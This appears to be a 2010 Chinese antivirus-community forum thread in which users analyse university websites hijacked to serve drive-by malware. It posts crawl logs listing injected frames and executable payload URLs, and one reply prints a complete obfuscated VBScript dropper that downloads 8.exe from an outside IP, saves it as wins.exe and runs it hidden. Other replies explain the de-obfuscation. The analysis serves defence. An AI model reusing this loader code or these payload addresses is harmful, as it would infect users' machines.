networkedition - 2010-7-23 12:56:00
网址均来自瑞星每日安全播报,我们详细分析其中所挂恶意网址,对于已失效的恶意网址就不再分析。
注:以下分析出的恶意网址均包含有真实网马下载地址,请勿直接下载并运行,以免系统中招。
1. http://ciee.cau.edu.cn/(开放的中国农业大学欢迎您!)
2. http://erm.bnu.edu.cn/(北京师范大学)
3. http://ge.lzu.edu.cn/(兰州大学欢迎您)
4. http://soft.psych.gov.cn/(南京工业大学心理健康教育中心)
5. http://www.law.sdu.edu.cn/(山东大学法学院)
用户系统信息:Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.2)
networkedition - 2010-7-23 12:57:00
Log is generated by FreShow.
[wide]http://ciee.cau.edu.cn/dqpy/index.asp
[frame]http://ciee.cau.edu.cn/dqpy/./xu_admin/list.htm
[object]http://202.205.89.194/8.exe
[script]http://ciee.cau.edu.cn/dqpy/count.asp
networkedition - 2010-7-23 12:57:00
关于:hxxp://erm.bnu.edu.cn/解密的日志(全体输出 - 14):
Level 0>http://erm.bnu.edu.cn/
Level 1>http://b%65i.Is%47re.%61t/b.js?google=07x231
Level 2>http://avn.2288.org/66/450ay.htm
Level 3>http://avn.2288.org/66/av.htm
Level 4>http://avn.2288.org/66/7.htm
Level 5>http://avn.2288.org/66/ieee.jpg
Level 5>http://avn.2288.org/66/iee.jpg
Level 6>http://avn.2288.org/o/tv.exe
Level 5>http://avn.2288.org/66/ie.jpg
Level 4>http://avn.2288.org/66/6.htm
Level 3>http://avn.2288.org/66/fff.swf ●
Level 3>http://avn.2288.org/66/iie.swf ●
Level 3>http://img.tongji.linezing.com/806392/tongji.gif
Level 3>http://js.tongji.linezing.com/806392/tongji.js
日志由 Redoce2.0第89次修正版于 2010-7-23 12:46:54 生成。
networkedition - 2010-7-23 12:57:00
Log is generated by FreShow.
[wide]http://ge.lzu.edu.cn/html/wz/2002128/news/1062298653324256.html
[script]http://js.users.51.la/3902985.js
[frame]http://www.anmo-tianjin.com/wow/wow6.htm
[object]http://www.zhajinhua.cc/xiazai/1.exe
networkedition - 2010-7-23 12:58:00
Log is generated by FreShow.
[wide]http://soft.psych.gov.cn/new/onlinezixun/list/013y.html
[frame]http://b12.17wanmei.com/tltl.html
[frame]http://www.katway.cn/css/js/tl/css.htm
[object]http://www.katway.cn/css/js/tl/Cute.htc
[object]http://www.tschk.com/Inc/new/tl.html
[object]http://yesoff.com/api/class/dll/tt.exe
[script]http://js.users.51.la/3993955.js
[script]http://s9.cnzz.com/stat.php?id=2046632&web_id=2046632
[script]http://js.users.51.la/3912534.js
networkedition - 2010-7-23 12:58:00
Log is generated by FreShow.
[wide]http://www.law.sdu.edu.cn/news/1e30b09dc36a4806.html
[script]http://js.users.51.la/3902985.js
[frame]http://www.anmo-tianjin.com/wow/wow27.htm
[object]http://www.zhajinhua.cc/xiazai/1.exe
辛达星郁 - 2010-7-23 14:41:00
貌似是新的加密方法,头一次见到。
解密代码可以直接从
http://ciee.cau.edu.cn/dqpy/./xu_admin/list.htm
挂马地址获取。
解密方法:1:Document.Write清除2:注意此代码
h000t000t000pxxx:xxx/xxx/xxx2xxx0xxx2xxx.xxx2xxx0xxx5xxx.xxx8xxx9xxx.xxx1xxx9xxx4xxx/xxx8xxx.xxxexxxxxxxexxx"
不注意很容易漏掉的,清除干扰字符“0、X”
最后解密:http://202.205.89.194/8.exe
jks_风 - 2010-7-23 15:32:00
Log is generated by FreShow.
[wide]http://ge.lzu.edu.cn/html/wz/2002128/news/1062298653324256.html
[script]http://js.users.51.la/3902985.js
[frame]http://www.anmo-tianjin.com/wow/wow6.htm
[object]http://www.zhajinhua.cc/xiazai/1.exe
jks_风 - 2010-7-23 15:39:00
Log is generated by FreShow.
[wide]http://soft.psych.gov.cn/new/onlinezixun/list/013y.html
[frame]http://b12.17wanmei.com/tltl.html
[frame]http://www.katway.cn/css/js/tl/css.htm
[object]http://www.katway.cn/css/js/tl/www.katway.cn/css/js/tl/Cute.htc
[object]http://www.tschk.com/Inc/new/tl.html
[object]http://yesoff.com/api/class/dll/tt.exe
[script]http://js.users.51.la/3993955.js
[script]http://s9.cnzz.com/stat.php?id=2046632&web_id=2046632
[script]http://js.users.51.la/3912534.js
jks_风 - 2010-7-23 15:52:00
Log is generated by FreShow.
[wide]http://www.law.sdu.edu.cn/news/1e30b09dc36a4806.html
[script]http://js.users.51.la/3902985.js
[frame]http://www.anmo-tianjin.com/wow/wow27.htm
[object]http://www.zhajinhua.cc/xiazai/1.exe
jks_风 - 2010-7-23 15:54:00
失效了 没能看见
小傻大呆 - 2010-7-23 19:16:00
<script language="VBScript">
on error resume next
pil1 = "Sxxxcxxxrxxxixxxpxxxtxxxixxxnxxxgxxx.xxxFxxxixxxlxxxexxxSxxxyxxxsxxxtxxxexxxmxxxOxxxbxxxjxxxexxxcxxxtxxx"
pil2 = "Sxxxhxxxexxxlxxxlxxx.xxxAxxxpxxxpxxxlxxxixxxcxxxaxxxtxxxixxxoxxxnxxx"
wj="wins.exe"
strl="Mrrrirrrcrrrrrrrorrrsrrrorrrfrrrtrrr.rrrXrrrMrrrLrrrHrrrTrrrTrrrPrrr"
strl4="orrrbrrrjrrrerrrcrrrtrrr"
strl5="Agggdgggogggdgggbggg.gggSgggtgggrgggegggagggmggg"
strl6="GgggEgggTggg"
strl7="c222l222a222s222s222i222d222"
pi8="c111l111s111i111d111:111B111D11191116111C111511151116111-11161115111A1113111-11111111111D1110111-111911181113111A111-11101110111C11101114111F111C11121119111E11131116111"
pi9 = "h000t000t000pxxx:xxx/xxx/xxx2xxx0xxx2xxx.xxx2xxx0xxx5xxx.xxx8xxx9xxx.xxx1xxx9xxx4xxx/xxx8xxx.xxxexxxxxxxexxx"
function chan(obt1)
chan=""
obt2 = len(obt1)
for i=1 to obt2 step 4
chan=chan+mid(obt1,i,1)
next
end function
pi1=chan(pil1)
pi2=chan(pil2)
str=chan(strl)
str4=chan(strl4)
str5=chan(strl5)
str6=chan(strl6)
str7=chan(strl7)
str8=chan(pi8)
dl=chan(pi9)
sub sub1(obt1,obt2)
df.setAttribute obt1,obt2
end sub
sub sub2(obt1,obt2,obt3,obt4,obt5,obt6)
obt1.type = obt3
obt2.Open obt4, obt5, obt6
obt2.Send
end sub
function fun1(obt1)
Set fun1 = document.createElement(obt1)
end function
function fun2(obt1)
set fun2 = df.createobject(obt1,"")
end function
sub fun3(obt1,obt2)
obt1.open
obt1.write obt2.responseBody
end sub
sub fun4(obt1,obt2,obt3)
obt1.savetofile obt2,obt3
end sub
function fun5(obt2,obt3)
set fun5 = obt2.createobject(obt3,"")
end function
Set df = fun1(str4)
sub1 str7,str8
Set x = fun2(Str)
set S = fun2(Str5)
sub2 S,x,1,str6,dl,false
call fun3(S,x)
fun4 S,fun2(pi1).BuildPath(fun2(pi1).GetSpecialFolder(2),wj),2
S.close
fun5(df,pi2).ShellExecute fun2(pi1).BuildPath(fun2(pi1).GetSpecialFolder(2),wj),"","","open",0
rem edit by labczm in cau
</script>
这里是去了Document.Write的
看辛达星郁 那句,这里面哪句代码是要求我驱除中间的乱七八糟的?
老师指点下吧...也麻烦辛达星郁说下
谢谢了
辛达星郁 - 2010-7-24 21:16:00
请仔细观察此代码!!
"h000t000t000pxxx:xxx/xxx/xxx2xxx0xxx2xxx.xxx2xxx0xxx5xxx.xxx8xxx9xxx.xxx1xxx9xxx4xxx/xxx8xxx.xxxexxxxxxxexxx"
试着去除其中杂项:“0、x”
先取出几个:
= "http:202.205.89.1x9xxx4xxx/xxx8xxx.xxxexxxxxxxexxx"
© 2000 - 2024 Rising Corp. Ltd.